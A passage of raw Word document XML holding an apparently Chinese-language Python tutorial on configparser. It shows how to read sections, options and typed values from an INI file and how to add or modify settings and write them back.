    <w:p w14:paraId="25543F02" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>print('sections:', config.sections())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01E800" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="602E0B49" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRPr="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>得到该</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>menu</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的所有</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>option</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NoSectionError</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6173CDB4" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB67D2">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>print('options:', config.options('menu'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A75898" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58FE8FC4" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>menu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有键值对，不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NoSectionError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE3629" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print('items:', config.items('menu'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD08236" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2017C0" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>menu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，返回为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NoSectionError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NoOptionError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133BFB31" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print('menu&gt;service(str):', config.get('menu', 'service'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20437D" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CA1790" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> menu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值，返回为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF69A3F" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print('menu&gt;id(int):', config.getint('menu', 'id'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71883FCC" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130457F1" w14:textId="77777777" w:rsidR="00AB67D2" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用法比较灵活</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30249AC8" w14:textId="28AE8282" w:rsidR="00D81E11" w:rsidRPr="00CA47FE" w:rsidRDefault="00AB67D2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print('menu&gt;id(int):', config['menu'].getint('id'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C773741" w14:textId="1DBA77E3" w:rsidR="00D81E11" w:rsidRPr="00CA47FE" w:rsidRDefault="00D81E11" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1596109D" w14:textId="31254705" w:rsidR="00CA47FE" w:rsidRPr="00CA47FE" w:rsidRDefault="00CA47FE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="_Toc159779905"/>
      <w:r w:rsidRPr="00CA47FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新增或者修改</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w14:paraId="1C386B48" w14:textId="2C137BF3" w:rsidR="00D81E11" w:rsidRPr="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC4475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例一：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC4475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC4475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>方法添加值，重新创建配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630723AC" w14:textId="23F062CA" w:rsidR="00CA47FE" w:rsidRDefault="00CA47FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432D056D" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from configparser import ConfigParser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3135FFB0" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9EDBA6" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>config = ConfigParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5D71E8" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">config.add_section('table')  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>table section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E79BD5" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config.set('table', 'order_th', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>订单号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>申请人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">')  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B523052" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config.set('table', 'user_th', '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">')  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1469AA" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with open('config.ini', 'w', encoding='utf-8') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580AA909" w14:textId="0926A196" w:rsidR="00CA47FE" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   config.write(file)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值写入配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241CB73F" w14:textId="7CAEB5EA" w:rsidR="00CA47FE" w:rsidRDefault="00CA47FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5585BD87" w14:textId="06C4D710" w:rsidR="00CA47FE" w:rsidRDefault="00CA47FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487B2D52" w14:textId="2A3B4E3E" w:rsidR="00CA47FE" w:rsidRPr="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC4475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例二：通过字典添加添加配置，重新创建配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CCC525" w14:textId="5FB3EE30" w:rsidR="00CA47FE" w:rsidRDefault="00CA47FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BB67EE9" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from configparser import ConfigParser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332F9832" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43EE910D" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>config = ConfigParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F863A" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>config['table'] = {'order_th': '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>订单号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>申请人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 'user_th': '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D2521" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with open('config.ini', 'w', encoding='utf-8') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C587CC" w14:textId="75563675" w:rsidR="00CA47FE" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   config.write(file)  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据写入配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463F751C" w14:textId="07740DAF" w:rsidR="00CA47FE" w:rsidRDefault="00CA47FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3DAAB3" w14:textId="7ACA4A5F" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D942B4D" w14:textId="38E12840" w:rsidR="00BC4475" w:rsidRPr="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC4475">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例三：修改配置文件数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658F230F" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRPr="00CA47FE" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362BE090" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from configparser import ConfigParser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C52CE60" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC41F74" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>path = 'zh_cn.config'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7722B" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>config = ConfigParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE3AAF8" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对文件修改必须先将文件读取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522D3A5" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>config.read(path, encoding='UTF-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341E3BD5" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config['table'] = {'order_th': '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>订单号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>申请人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>', 'user_th': '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA1A85" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config['menu']['help'] = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮助</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(F1)'  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于存在的值则是修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E08265F" w14:textId="77777777" w:rsidR="00BC4475" w:rsidRDefault="00BC4475" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>config['menu']['tool'] = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">'  # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于不存在的值时增加</w:t>
      </w:r>
    </w:p>
